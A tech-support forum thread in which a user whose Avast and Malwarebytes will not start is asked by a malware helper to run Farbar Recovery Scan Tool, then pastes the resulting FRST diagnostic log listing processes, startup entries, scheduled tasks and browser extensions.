Win7 won't open Avast or Malwarebytes

security avast Malwarebytes windows 7 win7 virus Malware

#1
vladana_91

  • Member
  • 18 posts

Basically what the headline says - I can't seem to open Avast or Malwarebytes. When I try with Avast, it says: "We've run into a problem and need to restart your antivirus" and when I try to restart it, I get the same message. With Malwarebytes I get the message that it is unable to start and "Unable to connect the service".

I'm getting kinda worried, the performance of my laptop hasn't changed at all but I like knowing that my antivirus programs are working. Any help would be much appreciated!



#2
RKinner

  • Malware Expert
  • Expert
  • 24,598 posts
  • MVP

  • Get FRST from http://www.bleepingc...very-scan-tool/
  • You need to download the appropriate tool for your PC. If you don't know if you have a 32- or 64-bit system, get them both. Only one will work, and that's the right one.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Check the Addition.txt box
  • Press Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.  
  • Please copy and paste log back here.
  • It will generate another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.

#3
vladana_91

  • Topic Starter
  • Member
  • 18 posts

Thank you so much for the quick reply.

 

Here is a copy of FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-11-2019
Ran by Vladana (administrator) on VLADANA-PC (FUJITSU LIFEBOOK AH512) (18-11-2019 14:53:34)
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Platform: Windows 7 Ultimate (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Hidfind.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel® Upgrade Service -> Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(iSkySoft) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Mixbyte Inc -> ) C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Popcorn Time) [File not signed] C:\Program Files (x86)\Popcorn Time\Updater.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(WONBO TECHNOLOGY Co.,LIMITED -> ) C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [589176 2011-12-20] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [11406608 2011-12-19] (Intel Corporation - Mobile Wireless Group -> Intel Corporation)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [169368 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [1058512 2018-12-18] (DivX, LLC. -> DivX, LLC)
HKLM-x32\...\Run: [NSU_agent] => C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe [190768 2012-02-28] (Nokia -> )
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [KeepVidProUpdateHelper.exe] => C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe [33912 2017-08-15] (WONBO TECHNOLOGY Co.,LIMITED -> )
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft) [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [644552 2019-07-04] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [240512 2019-10-25] (Mixbyte Inc -> )
HKLM\...\Winlogon: [Shell] explorer.exe,d.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [Google Update] => C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\GoogleUpdateCore.exe [218920 2019-11-05] (Google Inc -> Google LLC)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe [202024 2007-09-20] (Nero AG -> Nero AG)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\RunOnce: [Uninstall C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\MountPoints2: {da4eedc7-7be1-11e2-8ac3-806e6f6e6963} - E:\start.exe
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\78.0.3904.97\Installer\chrmstp.exe [2019-11-08] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2016-07-06]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat [2019-11-16] () [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0D4A518A-DF9A-4EF5-B2C9-BCCA25713362} - System32\Tasks\{3A66CE80-4733-4203-9F7A-462BED78E89F} => C:\Windows\system32\pcalua.exe -a E:\Boot\Setup.exe -d E:\
Task: {100579BF-7099-45D9-81DA-9283171425EF} - System32\Tasks\Opera scheduled Autoupdate 1433936833 => c:\program files (x86)\opera\launcher.exe [1534488 2019-11-05] (Opera Software AS -> Opera Software)
Task: {1BA80324-DEDD-4A84-B6B2-CA83338FEFC4} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {250DFF6E-ACA0-469C-AE95-348B168F5625} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_Plugin.exe [1457720 2019-11-13] (Adobe Inc. -> Adobe)
Task: {282CF3B9-D0D3-4C91-9592-8EBE019D3CD7} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {31E39139-7D23-449D-BCED-F7C976E90C09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {3647BA06-A942-4A3A-A231-81D956C0A720} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {3CDCC095-85A8-4F47-A3FD-E5901E10F3FF} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [369752 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {417C02B1-A8B8-4232-9ECA-7B637FC59D88} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {64B1DDAF-9698-4A74-994F-0A07F4D7B428} - System32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\Desktop\avast_secureline_setup.exe -d C:\Users\Vladana\Desktop
Task: {7795D282-1AC8-4061-8740-20E3A1600B28} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {82855C30-C4B7-4A15-8981-4489BC782605} - System32\Tasks\DivXUpdate => C:\Program Files (x86)\Common Files\DivX Shared\DivX Update\DivXUpdate.exe [68568 2017-08-02] (DivX, LLC -> DivX, LLC)
Task: {88983266-6574-4D42-9429-D9F16127D4A3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-11-13] (Adobe Inc. -> Adobe)
Task: {8C89DC2A-A626-4A37-9C20-27E3EAD3A4E5} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {8D71D9D7-DCCC-4240-BD4F-C4CA801119C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {99C2A032-6D1C-441F-87FE-DA0735A1B827} - System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe" -c -bootremove -uninst:RelevantKnowledge
Task: {9E09A37F-ED36-420C-A03C-DE3C2082D6BE} - System32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Car Thief 6 Full\Uninstall.exe" -c "C:\Program Files (x86)\Car Thief 6 Full\install.log"
Task: {A13BDE9B-63C9-405F-A251-35FF14182E3A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-18] (AVAST Software s.r.o. -> AVAST Software)
Task: {AB15FF1F-7BDC-44D9-BC91-CA52A72C11A7} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {BA2E555B-536B-40B0-8F32-8AE50F08B90F} - System32\Tasks\igfxhk => C:\Users\Vladana\AppData\Roaming\Terq\srvce.exe
Task: {C3E6B74D-A015-41CB-880A-351C9A99C7A1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {CFBA6569-6A55-4FC1-A592-F5F587B9D002} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_pepper.exe [1453112 2019-11-13] (Adobe Inc. -> Adobe)
Task: {D00D3C68-28B6-430D-83FD-061E0EAFCDA9} - System32\Tasks\{9194DE95-4B06-4F9D-B927-18DB5B401FBF} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\AppData\Local\TNT2\2.0.0.1534\TNT2User.exe -c /UNINSTALL PARTNER=10513
Task: {D3B04CF0-75EA-4648-ACB9-9595936714D9} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] (RealNetworks, Inc. -> )
Task: {EF68E912-4810-45BB-A8DF-394E2CB49789} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {F41616F1-BAE7-4545-B894-B26DB5462DA7} - System32\Tasks\SafeZone scheduled Autoupdate 1458718670 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {F99782F5-00F3-46F3-B278-C98C01F39A08} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0C2497A5-01F6-4BCC-9CA4-707802C9870D}: [DhcpNameServer] 10.0.0.1
Tcpip\..\Interfaces\{935B787B-988D-48CA-B7C2-9CD4F281E961}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{E0977D5E-E20A-454E-B20E-ED97A614D189}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
Handler: WSKVAllmytubechrome - {91AB862D-07B8-4A85 -  No File
 
FireFox:
========
FF DefaultProfile: 3mk9fbgv.default-1535656138801
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Sunbird\Profiles\qf1m1mra.default [2016-08-26]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\[email protected] [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 [2019-11-09]
FF Homepage: Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 -> hxxps://www.google.com/webhp?complete=0&hl=en
FF Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Video | GIF Downloader for Twitter) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7bcecd12-7e59-44fd-b721-8852ae8b20a8}.xpi [2019-08-24]
FF Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7fee47a1-8299-4576-90bf-5fd88d756926}.xpi [2019-08-24]
FF Extension: (Video Scrubber for Instagram) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{a68cb35a-62b5-4786-99f4-3e435f6590aa}.xpi [2019-11-08]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810 [2017-05-05]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2019-02-19]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2018-07-17]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-11-24] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
